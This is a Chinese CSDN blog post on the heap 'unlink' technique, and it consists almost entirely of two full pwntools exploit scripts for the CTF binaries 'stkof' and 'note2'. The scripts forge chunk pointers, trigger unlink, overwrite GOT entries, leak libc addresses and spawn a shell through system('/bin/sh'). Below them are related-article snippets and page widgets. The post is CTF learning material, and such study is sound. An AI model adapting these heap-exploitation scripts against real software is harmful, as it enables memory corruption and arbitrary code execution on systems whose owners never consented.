pwn 堆入门之unlink

最新推荐文章于 2023-06-19 22:54:45 发布
最新推荐文章于 2023-06-19 22:54:45 发布
阅读量207 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42689613/article/details/115553900
版权

目录

stkof

#!/usr/bin/env python2
from pwn import *

arch = "amd64"
filename = "stkof"

context(os="linux", arch=arch, log_level="debug")
content = 0

#elf
elf = ELF(filename)
fgets_addr=0x0000000000400D16
fill_addr=0x00000000004009E8
free_got=elf.got['free']
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
#libc
libc=ELF("libc.so.6")
puts_libc=libc.symbols['puts']
sys_libc=libc.symbols['system']

def alloc(size):
    io.sendline('1')
    io.sendline(str(size))

def fill(idx,size,payload):
    io.sendline('2')
    io.sendline(str(idx))
    io.sendline(str(size))
    io.send(payload)

def free(idx):
    io.sendline('3')
    io.sendline(str(idx))

def p(idx):
    io.sendline('4')
    io.sendline(str(idx))

def b(addr):
    bk = "b *" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")
    alloc(0x40)
    alloc(0x40)
    alloc(0x90)
    alloc(0x40)
    target=0x602150
    fakefd=target-0x18
    fakebk=target-0x10
    payload=p64(0)+p64(0x40)+p64(fakefd)+p64(fakebk)+b'a'*(0x20)+p64(0x40)+p64(0xa0)#+p64(fakefd)+p64(fakebk)
    #b(fill_addr)
    fill(2,len(payload),payload)
    #b(fgets_addr)
    free(3)
    #write_free_got
    #leak_payload
    payload=p64(0)+p64(0)+p64(free_got)+p64(puts_got)
    fill(2,len(payload),payload)
    payload=p64(puts_plt)
    fill(1,len(payload),payload)
    #b(fgets_addr)
    #leak---puts(puts_got)
    free(2)
    puts_addr=io.recvuntil("\x7f")[-6:].ljust(8,b'\x00')
    puts_addr=u64(puts_addr)
    print("puts_addr:",hex(puts_addr))
    #b(fgets_addr)
    #count
    libcbase=puts_addr-puts_libc
    sys_addr=libcbase+sys_libc
    #getshell_payload
    payload = p64(sys_addr)
    fill(1,len(payload), payload)
    payload=b'/bin/sh\x00'
    fill(4,len(payload), payload)
    #getshell---system("/bin/sh")
    free(4)
    io.interactive()
main()

note2

#!/usr/bin/env python2
from pwn import *

arch = "amd64"
filename = "note2"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)
menu_addr=0x0000000000400AFB
free_got=elf.got['free']
atoi_got=elf.got['atoi']
#puts_got=elf.got['puts']
#puts_plt=elf.plt['puts']
# libc
libc=ELF("libc.so.6")
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
#puts_libc=libc.symbols['puts']
sys_libc=libc.symbols['system']
free_libc=libc.symbols['free']
atoi_libc=libc.symbols['atoi']
one_libc=[0x45226,0x4527a,0x4527a,0xf1207]
def new(size,content):
    io.sendline("1")
    io.sendline(str(size))
    io.sendline(content)

def show(idx):
    io.sendline("2")
    io.sendline(str(idx))

def edit(idx,idxx,content):
    io.sendline("3")
    io.sendline(str(idx))
    io.sendline(str(idxx))
    io.sendline(content)

def delete(idx):
    io.sendline("4")
    io.sendline(str(idx))

def b(addr):
    bk = "b *" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")
    name=b'a'
    payload=b'ssssss'
    io.sendline(name)
    io.sendline(payload)
    ###init
    target=0x0000000000602120
    fakefd=target-0x18
    fakebk=target-0x10
    payload=p64(0)+p64(0xa0)+p64(fakefd)+p64(fakebk)
    ###
    new(0x80,payload)
    new(0x0,b'aaaa')
    new(0x80,b'ssss')
    delete(1)
    #over flow
    payload = b'a' * (0x10) + p64(0xa0) + p64(0x90)
    new(0x0,payload)
    #unlink
    delete(2)

    #over_write
    payload=b'a'*(0x18)+p64(atoi_got)
    #payload = b'a' * (0x18) + p64(free_got)
    ##+p64(fakefd)+p64(free_got)+p64(puts_got)+p64(puts_got)

    edit(0,1,payload)
    #b(menu_addr)
    show(0)
    atoi_addr = u64(io.recvuntil("\x7f")[-6:].ljust(8, b'\x00'))
    print("atoi_addr:", hex(atoi_addr))
    #free_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
    #print("free_addr:",hex(free_addr))

    #count
    libcbase = atoi_addr - atoi_libc
    #libcbase=free_addr-free_libc
    print("libcbase:",hex(libcbase))
    #b(menu_addr)
    sys_addr=libcbase+sys_libc
    onegadget=libcbase+one_libc[3]
    #change free->one[2],one[3]
    #change atoi->one[3]
    #getshell
    #edit(0,1,p64(onegadget))
    edit(0, 1, p64(sys_addr))
    io.sendline(b"/bin/sh\x00")
    #delete(0)
    io.interactive()
main()
qingmu-z
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn学习】溢出(三)- Unlink和UAF
Morphy_Amo的博客
01-21 1636
溢出中的unlink和UAF
漏洞-unlink
m0_52343643的博客
04-06 482
当一个块(非fastbin)释放时,libc会先看其相邻的块是否空闲,空闲的话就将这个相邻块从bins中取出,并与当前释放块合并,而这个bins中取出块的过程就是unlink
我又pwn啦——理论篇 unlink
m0_64195960的博客
06-20 549
1)定义:在双向链表中取出一个chunk的操作2)使用时间:1、malloc·在恰好大小的large chunk处取chunk时·在比请求大小大的bin中取chunk时2、Free·后向合并,合并物理相邻低物理地址空闲chunk时·前向合并,合并物理相邻高物理地空闲chunk时(top chunk除外)3、malloc_consolidate·后向合并,合并物理相邻低地址空闲chunk时·前向合并,合并物理相邻高地址空闲chunk时(top chunk除外)4、realloc前向扩展,合并物理相邻高地址空闲
PWN-入门基础
工作学习笔记
05-27 3782
简单介绍四个方面的内容:一是什么是PWN、二是做PWN所需知识储备、三是基于Ubuntu搭建PWN环境、四是在公网上练习PWN题。
​Unlink
weixin_42492218的博客
05-10 300
¶ZCTF 2016 的一道题目,考点是 safe unlink 的利用。¶题目是一个 notepad,提供了创建、删除、编辑、查看笔记的功能1.New note5.Quit保护如下所示NX : YesPIE : No¶程序 New 功能用来新建笔记,笔记的大小可以自定只要小于 1024 字节。int new()所有的笔记 malloc 出来的指针存放在 bss 上全局数组 bss_ptr 中,这个数组最多可以存放 8 个 heap_ptr。
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞等
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
warmup pwn入门
02-11
pwn入门
pwn入门题目+exp
最新发布
01-26
初级的ROP,附有完整exp,可以学一下
信息安全PWN入门指导
07-18
信息安全PWN入门指导:用于CTF的入门PWN的学习,是入门指导。
CTFshow-pwn入门-前置基础pwn23-pwn25
T1ngSh0w的博客
06-19 1721
CTFshow-pwn入门-前置基础pwn23-pwn25
pwn 入门基础
y0un9er
08-10 3668
简单介绍入门 pwn 所需要的基础知识,如:汇编、函数调用约定、常用工具等
ctf-pwn利用之unlink exploit(入门)
Vicl1fe的博客
09-17 1114
首先:阅读本文需要一定的基础知识。 参考链接:传送门 传送门 题目链接:传送门 Unlink unlink技术原理参考这个网址:传送门 现在看下面的代码。上面有题目链接。我的测试环境是ubuntu14和pwndbg。 #include <unistd.h> #include <stdlib.h> #include <string.h> #include &lt...
[网安实践III] 实验4.漏洞利用
LostUnravel的博客
11-09 1760
网安实践III - 实验4.漏洞利用 0 有关记录 编译glibc 在 /home/vagrant 解压 glibc 的压缩包 $ tar -xzvf ./gilibc-2.20-lwm.tgz 建立一个目录/home/vagrant/glibc-build, 进入这个目录后编译 glibc $ ../gilibc-2.20-lwm/configure --prefix=/home/vagrant/glibc-build/ $ make && make install 3.
入门
qq_42873161的博客
08-20 171
1.1 概念 1.逻辑上是一棵完全二叉树 2.物理是保存在数组中 3.满足任意结点的值都大于其子树中结点的值,叫做大,反之,则是小 4.的基本作用是快速找集合中的最值 小根及存储方式1.2 操作 - 向下调整 1.首先调整子结构,子结构变成大(小),从最小的树开始。(最后一个非叶子结点=(n-2)/2 n表示size) 2.在已经调整好的结构上继续调整更大的结构 3.直至调整到根节点结束 public class Heap{ public static void swap(i
Linux pwn入门教程,pwn入门系列教程1
weixin_29015899的博客
05-02 504
pwn入门系列教程1因为自己学的时候,找不到一个系统的教程,我将会按照ctf-wiki的目录一步步学下去,尽量做到每周有更新,方便跟我一样刚入门的人学习,第一篇教程研究了4天吧,途中没人指导。。很尴尬,自己一个很容易的点研究了很久才懂,把踩过的坑也总结下,方便后人不再踩坑学习链接环境搭建off by one原理(引用ctf-wiki)off-by-one 是指单字节缓冲区溢出,这种漏洞的产生...
漏洞之简单的unlink利用
sunrise的博客
08-09 4295
unlink漏洞(small bin)        当块free时,会检查相邻的后面的块(地址更小的),或者前面的块(地址更大的),是否空闲,如果空闲,那么需要进行块合并操作。 空闲的块一般以双向链表的形式组织(fast bin是单向链表,此攻击不适用),如果刚刚释放的块要与前面或者后面空闲的块进行合并操作,那么需要将前或后的块从双向链表中摘下来,合并成更大的块插入到u...
unlink函数_PWN-浅析unlink
weixin_39522103的博客
12-11 685
my blog:http://www.pwn4fun.com/About the unlinkunlink,在CTF中是比较常见的知识点。What’s the unlinkunlink_chunk函数用于将空闲的chunk从所在的bin中取出( 把一个双向链表中的空闲块拿出来),可以使用下图描述。可能触发unlink的情形:malloc_consolidate()函数将fastbin中的空闲chu...
溢出----Unlink
qq_42192672的博客
10-24 784
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/unlink/                   http://www.anquan.us/static/drops/tips-16610.html 原理直接拷贝CTFWIKI的原话 这个直接看图挺容易懂得,有点像数据结构的链表操作 这个就是unlink的基本操...
pwn unlink
08-27
而"unlink"是一种特定的攻击技术,用于利用溢出漏洞来篡改数据结构中的指针,从而绕过保护机制实现任意内存写入或代码执行。 具体来说,在一些使用了分配的程序中,如果程序中存在溢出漏洞,攻击者可以通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值